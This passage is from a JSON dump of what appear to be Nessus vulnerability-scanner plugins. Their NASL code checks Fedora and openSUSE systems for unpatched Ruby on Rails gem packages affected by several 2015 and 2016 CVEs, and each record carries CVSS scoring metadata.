preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"rubygem-actionview-4.2.5.2-3.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-01T14:21:59", "description": "Security fix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-activesupport-4.2.3-3.fc23 (2016-3ede04cd79)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-activesupport", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-3EDE04CD79.NASL", "href": "https://www.tenable.com/plugins/nessus/89523", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-3ede04cd79.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89523);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\");\n script_xref(name:\"FEDORA\", value:\"2016-3ede04cd79\");\n\n script_name(english:\"Fedora 23 : rubygem-activesupport-4.2.3-3.fc23 
(2016-3ede04cd79)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178068.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dbac83d6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-activesupport package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-activesupport-4.2.3-3.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-activesupport\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T16:34:29", "description": "This update for rubygem-actionview-4_2 fixes the following issues :\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution vulnerability in Action Pack (boo#968849)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, 
"published": "2016-03-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionview-4_2 (openSUSE-2016-352)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-352.NASL", "href": "https://www.tenable.com/plugins/nessus/89977", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-352.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89977);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2098\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionview-4_2 (openSUSE-2016-352)\");\n script_summary(english:\"Check for the openSUSE-2016-352 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rubygem-actionview-4_2 fixes the following issues :\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code\n execution vulnerability in Action Pack (boo#968849)\"\n 
);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968849\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionview-4_2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-4_2-4.2.4-9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-doc-4_2-4.2.4-9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1-rubygem-actionview-4_2 / ruby2.1-rubygem-actionview-doc-4_2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:35:32", "description": "- Fix rails-html-sanitizer v1.0.3 compatibility. * Fix code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-18T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionpack-4.2.3-5.fc23 / rubygem-actionview-4.2.3-5.fc23 (2016-f6af14570f)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-F6AF14570F.NASL", "href": "https://www.tenable.com/plugins/nessus/90016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-f6af14570f.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90016);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2098\");\n script_xref(name:\"FEDORA\", 
value:\"2016-f6af14570f\");\n\n script_name(english:\"Fedora 23 : rubygem-actionpack-4.2.3-5.fc23 / rubygem-actionview-4.2.3-5.fc23 (2016-f6af14570f)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix rails-html-sanitizer v1.0.3 compatibility. * Fix\n code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1310054\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178984.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c725a74\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178985.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f493f2b9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rubygem-actionpack and / or rubygem-actionview\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionpack-4.2.3-5.fc23\")) flag++;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionview-4.2.3-5.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack / rubygem-actionview\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:34:13", "description": "- Fix rails-html-sanitizer v1.0.3 compatibility. * Fix code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-03-18T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-actionpack-4.2.0-4.fc22 / rubygem-actionview-4.2.0-5.fc22 (2016-3954061e32)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-3954061E32.NASL", "href": "https://www.tenable.com/plugins/nessus/90013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-3954061e32.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90013);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2098\");\n script_xref(name:\"FEDORA\", 
value:\"2016-3954061e32\");\n\n script_name(english:\"Fedora 22 : rubygem-actionpack-4.2.0-4.fc22 / rubygem-actionview-4.2.0-5.fc22 (2016-3954061e32)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fix rails-html-sanitizer v1.0.3 compatibility. * Fix\n code injection vulnerability (CVE-2016-2098).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1310054\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179025.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8619985\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179026.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b85e285\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rubygem-actionpack and / or rubygem-actionview\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails ActionPack Inline ERB Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionpack-4.2.0-4.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionview-4.2.0-5.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack / rubygem-actionview\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T16:33:23", "description": "Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-actionview-4.2.0-3.fc22 (2016-fa0dec2360)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-FA0DEC2360.NASL", "href": "https://www.tenable.com/plugins/nessus/89644", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-fa0dec2360.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89644);\n script_version(\"1.9\");\n 